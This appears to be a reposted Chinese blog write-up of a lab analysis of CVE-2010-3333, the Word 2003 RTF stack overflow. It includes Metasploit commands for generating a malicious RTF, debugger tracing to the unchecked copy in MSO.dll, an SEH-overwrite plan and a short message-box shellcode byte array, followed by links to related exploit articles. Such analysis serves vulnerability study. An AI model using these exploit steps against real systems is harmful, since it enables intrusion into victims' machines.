CVE-2010-3333 Word RTF 栈溢出漏洞

最新推荐文章于 2023-04-04 14:27:56 发布
最新推荐文章于 2023-04-04 14:27:56 发布
阅读量245 收藏
点赞数
文章标签: 操作系统 python
原文链接:https://my.oschina.net/u/3281747/blog/1805288
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  1. 实验环境        
    • OS:Windows XP sp3
    • 漏洞软件:Word 2003
    • 工具:x32dbg+IDA 6.8+01Editor+C32ASM
  2. 样本生成
    • msfconsole
    • search cve-2010-3333
    • use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    • set target 6
    • exploit
  3. 分析过程 

        打开Word 2003并且附加到x32dbg中,并用Word 03打开目标文件(此处是Crack.rtf),发现日志中有异常记录,异常点位于30E9KB88处(位于MSO.dll中)

此处从0x11040004处复制到0x00123DC0处,次数为0x322B次(0xACC8/4),具体情况我们回溯到0x30F4CC96处上面查看到Crack处的函数调用了来自0x30F4CC93处的Call dword ptr [eax+1C] //call sub_30E9EB62()。在IDA Pro中查看30E9EB62(),发现就是简单的调用qmemcpy(dst,src,count)

再次断点到0x30F4CC93处来查看,发现dst是0x00123DC0,src是0x1104000C([0x014D10F0+0x10]),count是0xACC8([0x014D10F0+0x8]),而sub_30F4CC5D()中只有0x14字节的空间(sub_30E9EB62()不开辟新的栈空间),0xACC8早就溢出当前函数的栈空间了,所以此处未对qmemcpy()中的count进行检查而导致栈溢出。

跟踪内存发现,我们复制的内容是Crack.rtf中acc8后的文本(此处文本转成了十六进制,即“41”=》0x41),而前面的“acc8”也刚好对应之前的qmemcpy()的count。

    最后,构造POC,第一时间我想到SEH exploit,恰好通过Mona检测到MSO.dll的SafeSEH是关闭的并且找到0x30CA50A9处作为ROP链首,溢出的SEH处的内容在Crack.rtf中的0x176C0偏移处。

最终得出shellcode。

shellcode={
  \xeb,\x0a,\x90,\x90,\xa9,\x50,\xca,\x30,\x90,\x90,\x90,\x90,
  \x6A,\x00,\x68,\x46,\x75,\x63,\x6B,\x89,\xE0,\x6A,\x00,\x68,\x43,\x61,\x70,\x00,
  \x89,\xE3,\x6A,\x00,\x53,\x50,\x6A,\x00,\xBA,\x30,\x1C,\xC9,\x30,\x8B,\x12,\xFF,\xD2,\xC3,
}
//shellcode=jmp 0A+\x90*2+ROP address+\x90*4+payload

效果如图所示:

PS:RTF文件格式说明

 

 

 

 

 

 

转载于:https://my.oschina.net/u/3281747/blog/1805288

weixin_34372728
关注
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞,Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
动手实验 CVE-2010-3333 Microsoft RTF栈溢出漏洞
abelxu
02-13 4072
手把手分析CVE-2010-3333 RTF栈溢出漏洞,同时分析了msf如何生成通用性的exp
漏洞cve2010-3333
m0_64973256的博客
12-22 738
可以看到,ESI地址指向的值已经拷贝到了栈中EBP-10的位置向下。而返回地址在EBP+4的位置,我们已经可以确定淹没返回值的位置了。cve-2010-3333是一个Office 2003栈溢出漏洞,其原因是在文档中读取一个属性值的时候,没有对其长度验证,导致了一个溢出,看着很简单的一个漏洞,却又有点恶心人。这里7FFA4512已经被识别成70004512。后面的弹窗shellcode也是一样。标记3处:这里是00000000,用来让je跳转,不要进入循环call;
CVE-2010-3333:Microsoft RTF 栈溢出漏洞调试分析
CuiXY's Blog
02-08 804
0x01 前言 cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft文档在处理 RTF 数据的对数据解析处理错误,在进行内存操作时没有对操作的数据进行长度限制,导致存在内存漏洞 环境 windows XP sp3(关闭了 ASLR) 分析工具 windbg 样本 能触发漏洞产生异常的 POC 目的 通过栈回溯的方式找到漏洞溢出点,分析漏洞成因 0x02 通过 me...
CVE-2010-3333
weixin_30640769的博客
09-17 288
---恢复内容开始--- 漏洞描述   CVE-2010-3333漏洞是Microsoft Office RTF分析器堆栈溢出漏洞,对应的Microsoft安全公告是MS10-087。远程攻击者可以借助特制的RTF数据执行任意代码,该漏洞又名"RTF栈缓冲区溢出漏洞"。 漏洞分析   通过exp文件来定位漏洞位置在进一步分析漏洞原因。先直接运行漏洞文档用监控工具观察触发漏洞后的行为。 ...
Microsoft RTF栈溢出漏洞(CVE-2010-3333)漏洞分析
鬼手的博客
08-04 2018
文章目录漏洞描述分析环境RTF文件格式基于栈回溯的漏洞分析方法漏洞利用Office 2003与Office 2007 Exploit通用性研究 漏洞描述 Microsoft Office XP SP3,Office2003SP3,Office2007 SP2,Office 2010等多个版本的Office软件中,Open XML文件格式转换器存在栈溢出漏洞,主要是在处理RTF中的pFragment...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
cve-2010-3333 分析简笔
weixin_38166557的博客
05-18 220
昨天分析了半拉,感觉整个过程很条理;但是今天再接着昨天的思路往下调试的时候,不知该在哪下断点了,翻阅了昨天的随手的记录才有了些印象,但是思路还是一团。看来写篇随笔还是很有必要的。故作此文。 简介Microsoft Office 是微软发布的非常流行的办公软件套件。 基于Mac平台的Microsoft Office XP SP3,Office 200...
Microsoft Word RTF Font Table Heap Corruption - 漏洞解析(CVE-2023-21716)
0pr
03-09 1510
本文对 Office Word RTF Heap Corruption(CVE-2023-21716)进行了一些分析。目前为止,我们找到了 wwlib 库中的问题方法,初步了解了 RTF 格式以及控制字符。接着我们对 wwlib 中的 **FSearchFtcmap** 方法进行了行为分析,知道了 font id 是存放在 esi 中,切 esi 作为循环加载字体的 index,index 值将会使用 **movsx** 指令分别加载到 ecx 和 edx 中。
最新|RTF RCE 漏洞 CVE-2023-21716剖析
最新发布
baidu_38876334的博客
04-04 914
RTF文件中的漏洞是由于RTF文件处理器在解析文本内容时存在缺陷。攻击者可以利用特殊构造的RTF文件来欺骗受害者执行恶意代码。具体来说,攻击者可以在RTF文件中插入恶意代码,然后将RTF文件发送给受害者,一旦受害者打开该文件,恶意代码就会被执行。
​​​​​​​CVE-2010-3333分析
wangtiankuo的博客
11-23 509
1.漏洞背景     RTF中“pFragments”属性存在栈溢出,远程攻击者可以借助特制的RTF数据执行任意代码。     RTF分析器在解析pFragments属性值时,没有正确计算属性值所占用的空间大小,导致栈溢出漏洞的发生,      后面有个图里圈出了要复制的数据大小以及数据。 2.漏洞成因     使用msf生成漏洞文档后,用windbg打开,在30e9eb88处发生...
漏洞战争》学习笔记·2 CVE-2010-3333
黑夜黎明
05-27 701
知识补充   RTF格式是为文本和图像信息格式的交换制定的一种文件格式,使用与不同设备,操作环境和系统。RTF文件基本元素:正文、控制字、控制符号、群组   控制字: RTF用来标记打印控制字符和管理文档信息的一种特殊格式的命令,RTF用它做正文格式的控制代码,每个控制字均以一个 反斜杠\开头 ,由a~z小写字母组成,通常不应该包含任何大写字母,而每个分隔符标志着控制字名称的结束。使用格式:\字母...
适合新手入门的漏洞调试与分析—CVE-2010-3333
HBohan的博客
07-29 662
这是第二次在tools发帖,为了响应管理猿的号召,也为了爱好应用程序安全新手的需要。在此,我初步研究了一下微软3333漏洞的成因,并试着定位到了样本中的shellcode,现在就对这个入门级的漏洞做个简单的分析:   首先,我们还是用OD加载word.exe程序,按F9运行。如图:    图(一) 接下来,我们要具体分析3333漏洞出现的成因(具体的可以百度)。经过查询,我们知道导致3333漏洞的原因,是因为漏洞产生在MSO.DLL文件中,下文以Microsoft Office2003的MSO.DLL.
对ms10-087(CVE-2010-3333漏洞分析
Saber
07-04 3520
表示这个漏洞还是有很大的
CVE-2010-3333 分析学习
bluebloodye的专栏
03-10 854
0x01漏洞描述 0x02分析环境 环境 备注 操作系统 winxpsp3 网上下的镜像 虚拟机 VMware 版本号 15.0.2 调试器 o...
修复OpenSSH J PAKE漏洞CVE-2010-4478:Linux OpenSSH重装指南
"解决OpenSSH J-PAKE授权问题漏洞CVE-2010-4478的Linux上OpenSSH重装方法" OpenSSH是一款广泛使用的开源安全协议,用于在Linux和Unix系统之间提供加密的网络服务,如远程登录、文件传输等。然而,它也可能会存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值